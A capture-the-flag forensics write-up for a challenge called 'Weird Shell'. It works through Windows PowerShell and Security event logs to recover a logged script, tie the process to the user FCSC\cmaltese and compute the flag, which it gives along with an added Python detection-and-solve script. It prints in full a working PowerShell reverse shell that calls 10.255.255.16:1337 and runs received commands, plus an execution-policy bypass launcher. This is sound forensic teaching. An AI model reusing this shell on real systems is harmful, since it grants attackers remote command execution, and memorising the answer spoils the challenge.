Weird Shell
Category: forensics
Difficulty: ⭐
Statement
Another user has similar behavior to Windows Gazette (intro category). But this time, to find what was sent to the attacker, you may need more logs.
SHA256(Microsoft-Windows-PowerShell%4Operational.evtx) = 7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc
SHA256(Security.evtx) = 1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689
Solve
We first check the integrity of the log files against the published hashes:
```bash
sha256sum Microsoft-Windows-PowerShell4Operational.evtx | grep 7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc
7b2ce2b5d231c9c09018fed031b1e8aae7a661d192167fb29f238a29bf744bdc Microsoft-Windows-PowerShell4Operational.evtx
sha256sum Security.evtx | grep 1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689
1c55121cd0488aa625d44eefd7560e8e7749306358ae312523946891edc1f689 Security.evtx
```
We use evtx_dump (from the evtx tool) to convert both .evtx files to JSON, which is much easier to grep through:
```bash
./evtx_dump -o json Microsoft-Windows-PowerShell4Operational.evtx > powershell.json
./evtx_dump -o json Security.evtx > security.json
```
We look for references to a PowerShell script file in the script block logs:
```bash
cat powershell.json | grep -i ".ps1"
"ScriptBlockText": "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'D:\\PAYLOAD.PS1'"
"Path": "D:\\PAYLOAD.PS1",
"Path": "D:\\PAYLOAD.PS1",
"Path": "D:\\PAYLOAD.PS1",
```
At record 1467 (event 4104, script block logging), we see the one-liner that lowers the execution policy for the current process and then launches PAYLOAD.PS1:
```json
Record 1467
{
  "Event": {
    "#attributes": {
      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
    },
    "EventData": {
      "MessageNumber": 1,
      "MessageTotal": 1,
      "Path": "",
      "ScriptBlockId": "fab1cf7c-71d9-40fc-8f4d-6440a06f856f",
      "ScriptBlockText": "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'D:\\PAYLOAD.PS1'"
    },
    "System": {
      "Channel": "Microsoft-Windows-PowerShell/Operational",
      "Computer": "DESKTOP-AL3DV8F.fcsc.fr",
      "Correlation": {
        "#attributes": {
          "ActivityID": "F3D5BB62-656E-0001-1F13-D6F36E65D901"
        }
      },
      "EventID": 4104,
      "EventRecordID": 1467,
      "Execution": {
        "#attributes": {
          "ProcessID": 3788,
          "ThreadID": 748
        }
      },
```
At record 1468, the content of PAYLOAD.PS1 itself is logged as a script block (note the Path field now points to D:\PAYLOAD.PS1) when the script is executed:
```json
Record 1468
{
  "Event": {
    "#attributes": {
      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
    },
    "EventData": {
      "MessageNumber": 1,
      "MessageTotal": 1,
      "Path": "D:\\PAYLOAD.PS1",
      "ScriptBlockId": "2354b750-2422-42a3-b8c2-4fd7fd36dfe7",
      "ScriptBlockText": "do {\n Start-Sleep -Seconds 1\n try{\n $TCPClient = New-Object Net.Sockets.TCPClient('10.255.255.16', 1337)\n } catch {}\n} until ($TCPClient.Connected)\n$NetworkStream = $TCPClient.GetStream()\n$StreamWriter = New-Object IO.StreamWriter($NetworkStream)\nfunction WriteToStream ($String) {\n [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}\n $StreamWriter.Write($String + 'SHELL> ')\n $StreamWriter.Flush()\n}\nWriteToStream \"FCSC{$(([System.BitConverter]::ToString(([System.Security.Cryptography.SHA256]::Create()).ComputeHash(([System.Text.Encoding]::UTF8.GetBytes(((Get-Process -Id $PID).Id.ToString()+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name).ToString()))))).Replace('-', '').ToLower())}`n\"\nwhile(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {\n $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)\n $Output = try {\n Invoke-Expression $Command 2>&1 | Out-String\n } catch {\n $_ | Out-String\n }\n WriteToStream ($Output)\n}\n$StreamWriter.Close()\n"
    },
    "System": {
      "Channel": "Microsoft-Windows-PowerShell/Operational",
      "Computer": "DESKTOP-AL3DV8F.fcsc.fr",
      "Correlation": {
        "#attributes": {
          "ActivityID": "F3D5BB62-656E-0000-5F11-D6F36E65D901"
        }
      },
      "EventID": 4104,
      "EventRecordID": 1468,
      "Execution": {
        "#attributes": {
          "ProcessID": 3788,
          "ThreadID": 748
        }
      },
```
We reformat the PowerShell script block for readability:
```powershell
do {
    Start-Sleep -Seconds 1
    try {
        $TCPClient = New-Object Net.Sockets.TCPClient('10.255.255.16', 1337)
    } catch {}
} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
function WriteToStream ($String) {
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}
WriteToStream "FCSC{$(([System.BitConverter]::ToString(([System.Security.Cryptography.SHA256]::Create()).ComputeHash(([System.Text.Encoding]::UTF8.GetBytes(((Get-Process -Id $PID).Id.ToString()+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name).ToString()))))).Replace('-', '').ToLower())}`n"
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    $Output = try {
        Invoke-Expression $Command 2>&1 | Out-String
    } catch {
        $_ | Out-String
    }
    WriteToStream ($Output)
}
$StreamWriter.Close()
```
The script is a reverse shell. It retries every second until it manages to open a TCP connection to 10.255.255.16 on port 1337. It then sends a first message of the form FCSC{hash}, where hash is the lowercase hex SHA256 of the PowerShell process identifier (PID) concatenated with the current user name as returned by WindowsIdentity.GetCurrent().Name. After that it reads commands from the socket, runs them with Invoke-Expression and writes the output back prefixed with a SHELL> prompt. The flag is therefore the value sent to the attacker, and recomputing it requires the PID and the user name at the time PAYLOAD.PS1 was executed.
Records 1468 and 1469 of the PowerShell logs give us the PID of the powershell.exe process that ran the script block: 3788
```json
"EventID": 4104,
"EventRecordID": 1467,
"Execution": {
  "#attributes": {
    "ProcessID": 3788,
    "ThreadID": 748
  }
}
```
At record 59778 in the Security logs, the process creation event for powershell.exe carries the same launcher command line, so it tells us which user ran PAYLOAD.PS1. Pay attention to the format of the name: WindowsIdentity.GetCurrent().Name returns DOMAIN\user, and since the machine is joined to a domain (see the fcsc.fr suffix on the computer name), the prefix is the NetBIOS name of the domain (SubjectDomainName) rather than the machine name: FCSC\cmaltese
```json
Record 59778
{
  "Event": {
    "#attributes": {
      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
    },
    "EventData": {
      "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"-Command\" \"if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'D:\\PAYLOAD.PS1'\"",
      "MandatoryLabel": "S-1-16-8192",
      "NewProcessId": "0xecc",
      "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "ParentProcessName": "C:\\Windows\\explorer.exe",
      "ProcessId": "0x1544",
      "SubjectDomainName": "FCSC",
      "SubjectLogonId": "0x647ad",
      "SubjectUserName": "cmaltese",
      "SubjectUserSid": "S-1-5-21-3727796838-1318123174-2233927406-1107",
      "TargetDomainName": "-",
      "TargetLogonId": "0x0",
      "TargetUserName": "-",
      "TargetUserSid": "S-1-0-0",
      "TokenElevationType": "%%1936"
    }
```
We take the expression that builds the flag, substitute the PID and the user name we recovered for the runtime lookups, and print the result:
```powershell
Write-Output "FCSC{$(([System.BitConverter]::ToString(([System.Security.Cryptography.SHA256]::Create()).ComputeHash(([System.Text.Encoding]::UTF8.GetBytes(("3788"+"FCSC\cmaltese").ToString()))))).Replace('-', '').ToLower())}`n"
```
Flag: FCSC{21311ed8321926a27f6a6c407fdbe7dc308535caad861c004b382402b556bbfa}
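The whole chain of this solve, as an added Python example that is not part of the original write-up: parse the evtx_dump JSON layout, pick out the 4104 script block that looks like a network shell and its ProcessID, tie it to the Security process creation record by matching NewProcessId 0xecc (hex) against ProcessID 3788 (decimal), and recompute the SHA256 the script sent. The two dump samples are constructed and trimmed to the fields used; the Security record's EventID 4688 is assumed, since the excerpt above omits its System block.

```python
import hashlib
import json
import re

# Constructed samples in the "Record N" + JSON layout that evtx_dump -o json
# prints, trimmed to the fields used below; values are those from the write-up.
POWERSHELL_DUMP = r"""Record 1468
{"Event": {"EventData": {"Path": "D:\\PAYLOAD.PS1", "ScriptBlockText": "$TCPClient = New-Object Net.Sockets.TCPClient('10.255.255.16', 1337)"}, "System": {"EventID": 4104, "EventRecordID": 1468, "Execution": {"#attributes": {"ProcessID": 3788, "ThreadID": 748}}}}}
"""
# The write-up's Security excerpt omits the System block; 4688 (process creation) is assumed.
SECURITY_DUMP = r"""Record 59778
{"Event": {"EventData": {"CommandLine": "powershell.exe -Command \"& 'D:\\PAYLOAD.PS1'\"", "NewProcessId": "0xecc", "SubjectDomainName": "FCSC", "SubjectUserName": "cmaltese"}, "System": {"EventID": 4688, "EventRecordID": 59778}}}
"""

def parse_dump(text):
    """Yield (record_id, event) pairs from evtx_dump's "Record N" line followed by JSON."""
    parts = re.split(r"^Record (\d+)\r?\n", text, flags=re.M)
    for rid, body in zip(parts[1::2], parts[2::2]):
        yield int(rid), json.loads(body)["Event"]

# Markers of an interactive network shell in a script block (all three appear in PAYLOAD.PS1).
SHELL_MARKERS = ("Net.Sockets.TCPClient", "GetStream()", "Invoke-Expression")

def find_shell_blocks(events):
    """Return (record_id, script_path, process_id) for 4104 blocks that look like a shell."""
    hits = []
    for rid, ev in events:
        text = ev["EventData"].get("ScriptBlockText", "")
        if ev["System"]["EventID"] == 4104 and any(m in text for m in SHELL_MARKERS):
            pid = ev["System"]["Execution"]["#attributes"]["ProcessID"]  # decimal in 4104
            hits.append((rid, ev["EventData"]["Path"], pid))
    return hits

def find_process_owner(events, pid):
    """Return DOMAIN\\user from the 4688 whose NewProcessId (hex string) equals the 4104 PID."""
    for _rid, ev in events:
        data = ev["EventData"]
        if ev["System"]["EventID"] == 4688 and int(data["NewProcessId"], 16) == pid:
            return f"{data['SubjectDomainName']}\\{data['SubjectUserName']}"
    return None

def identity_flag(pid, user):
    """Recompute what the script sent: SHA256(str(PID) + DOMAIN\\user) as lowercase hex."""
    digest = hashlib.sha256(f"{pid}{user}".encode("utf-8")).hexdigest()
    return f"FCSC{{{digest}}}"

def solve(ps_dump, sec_dump):
    """Chain the three steps; returns (pid, user, flag)."""
    _rid, _path, pid = find_shell_blocks(parse_dump(ps_dump))[0]
    user = find_process_owner(parse_dump(sec_dump), pid)
    return pid, user, identity_flag(pid, user)
```

Running `solve(POWERSHELL_DUMP, SECURITY_DUMP)` reproduces the PID 3788 and the user FCSC\cmaltese used in the Write-Output line above; the hex/decimal PID match is the link between the two channels that the grep-based solve leaves implicit.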